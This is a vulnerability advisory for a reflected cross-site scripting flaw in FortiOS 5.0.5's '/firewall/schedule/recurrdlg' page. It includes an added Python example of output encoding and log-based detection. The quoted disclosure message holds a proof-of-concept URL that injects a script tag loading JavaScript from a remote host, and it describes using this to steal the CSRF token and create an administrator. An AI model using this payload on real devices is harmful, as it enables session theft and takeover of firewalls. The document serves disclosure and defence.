Fortinet FortiGate/FortiOS Input Validation Flaw Permits Cross-Site Scripting Attacks

SecurityTracker Alert ID: 1029730
SecurityTracker URL: http://securitytracker.com/id/1029730
CVE Reference: CVE-2013-7182
Updated: Feb 12 2014
Original Entry Date: Feb 6 2014
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available: Yes
Vendor Confirmed: Yes
Exploit Included: Yes
Version(s): 5.0.5 and prior
Description:
A vulnerability was reported in Fortinet FortiGate/FortiOS. A remote user can conduct cross-site scripting attacks.
The '/firewall/schedule/recurrdlg' script does not properly filter HTML code from user-supplied input in the 'mkey' parameter before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the FortiGate interface and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
William Costa reported this vulnerability.
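The flaw described above is a reflection of the 'mkey' value into HTML without output encoding. The following is an added example, not code from the advisory or from Fortinet: it contrasts a raw attribute reflection with a contextually encoded one, and flags requests to the affected path whose 'mkey' value carries attribute-breakout characters. The attribute context, the log format and the log lines are assumptions constructed for the example.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Stand-in for a dialog page reflecting 'mkey' into a quoted attribute (assumption:
# the real FortiOS template is not public; this mirrors the context implied by the PoC).
def render_vulnerable(mkey: str) -> str:
    # Raw interpolation: a value containing '">' closes the attribute and the tag,
    # so everything after it is parsed as new markup.
    return '<input name="mkey" value="' + mkey + '">'

def render_hardened(mkey: str) -> str:
    # Contextual output encoding: quote=True also turns '"' into '&quot;', so the
    # value cannot terminate the attribute; '<', '>' and '&' are encoded as well.
    return '<input name="mkey" value="' + html.escape(mkey, quote=True) + '">'

def escapes_attribute(fragment: str) -> bool:
    # True when the rendered fragment contains any tag beyond the one we emitted.
    return fragment.count("<") > 1

# Detection: flag requests for the affected path whose 'mkey' carries characters
# that can break out of an attribute or open a tag.
AFFECTED_PATH = "/firewall/schedule/recurrdlg"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def suspicious_mkey(log_line: str) -> bool:
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    url = urlsplit(m.group(1))
    if url.path != AFFECTED_PATH:
        return False
    # parse_qs percent-decodes the values, so encoded %22 / %3E / %3C are caught too.
    return any(c in v for v in parse_qs(url.query).get("mkey", []) for c in '"<>')

# Constructed access-log lines (not real FortiGate logs) so the example runs offline.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Feb/2014:10:00:01 +0000] "GET /firewall/schedule/recurrdlg?mkey=weekly HTTP/1.1" 200 4120',
    '10.0.0.9 - - [06/Feb/2014:10:00:07 +0000] "GET /firewall/schedule/recurrdlg?mkey=a%22%3E%3Cscript%3E HTTP/1.1" 200 4132',
    '10.0.0.9 - - [06/Feb/2014:10:00:09 +0000] "GET /firewall/policy/policy?mkey=%22%3E HTTP/1.1" 200 2000',
]

def flagged_lines(lines):
    # Indices of log lines that hit the affected path with a suspicious 'mkey'.
    return [i for i, line in enumerate(lines) if suspicious_mkey(line)]

if __name__ == "__main__":
    print(render_hardened('a"><script>'))
    print("flagged:", flagged_lines(SAMPLE_LOG))
```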
Impact:
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the FortiGate interface, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:
The vendor has issued a fix (5.0.6).
The vendor's advisory is available at:
http://www.fortiguard.com/advisory/FG-IR-14-003/
Vendor URL: www.fortiguard.com/advisory/FG-IR-14-003/
Cause:
Input validation error
Message History:
None.
Source Message Contents
Subject: [Full-disclosure] Fortinet FortiOS 5.0.5 contains a reflected cross-site scripting (XSS) vulnerability ( CVE-2013-7182)
I. VULNERABILITY
-------------------------
Reflected XSS vulnerabilities in FortiOS 5.0.5
II. BACKGROUND
-------------------------
Fortinet's industry-leading, Network Security Platforms deliver Next
Generation Firewall (NGFW) security with exceptional throughput, ultra
low latency, and multi-vector threat protection.
III. DESCRIPTION
-------------------------
A reflected XSS vulnerability has been detected in FortiOS 5.0.5.
The code injection is done through the parameter "mkey" in the page
"/firewall/schedule/recurrdlg".
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter "mkey" correctly.
http://IP_FORTIGATE/firewall/schedule/recurrdlg?mkey=a"><SCRIPT SRC="http://10.0.1.120/xss/good.js"></SCRIPT>
V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, which allows arbitrary HTML/script code to be executed
in the context of the victim user's browser, allowing theft of the CSRF
token, thus enabling the creation of an Administrator user in the box
for full access.
VI. SYSTEMS AFFECTED
-------------------------
Try FortiOS v5.0.5 VM and Appliance
VII. SOLUTION
------------------------
Upgrade to FortiOS 5.0.6 or higher.
References
-------------------------
http://www.fortiguard.com/advisory/FG-IR-14-003/
http://www.kb.cert.org/vuls/id/728638
By William Costa